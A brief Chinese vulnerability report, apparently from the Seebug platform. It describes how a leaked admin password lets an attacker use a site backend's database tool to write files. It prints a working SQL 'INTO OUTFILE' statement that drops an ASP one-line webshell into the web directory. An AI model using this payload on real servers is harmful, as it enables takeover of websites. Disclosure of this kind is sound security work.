### 简要描述:
假如你的账户密码泄露了 那你就危险了 在后台能直接拿webshell
### 详细说明:
后台为方便站长有个数据库工具 在哪里执行
Select '<%execute request("value")%>' into outfile 'F:/wwwroot/shiyanshi/cache/1.asp';
就写入了一句话木马 然后就可以任意作为了
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201303/31220100718a1a3c44d6e2467b44893ac91046c8.jpg" alt="2名.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/31220100718a1a3c44d6e2467b44893ac91046c8.jpg)
[<img src="https://images.seebug.org/upload/201303/31220049a4835c16fe68b09be4897c28c5d9da04.jpg" alt=".jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201303/31220049a4835c16fe68b09be4897c28c5d9da04.jpg)
暂无评论